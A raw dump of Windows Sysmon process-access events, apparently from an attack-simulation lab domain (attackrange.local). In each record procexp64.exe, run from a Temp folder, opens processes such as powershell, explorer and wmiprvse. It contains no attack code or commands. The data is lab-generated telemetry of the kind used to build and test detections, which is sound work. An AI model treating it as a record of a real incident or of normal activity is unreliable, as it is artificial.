15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 